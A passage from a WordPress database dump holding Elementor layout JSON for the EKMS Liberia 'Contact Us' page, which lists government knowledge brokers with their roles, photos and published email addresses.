Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(16030,2422,'_elementor_edit_mode','builder'),(16031,2422,'_elementor_template_type','wp-page'),(16032,2422,'_elementor_version','2.7.5'),(16033,2422,'_wp_page_template','default'),(16034,2422,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_siz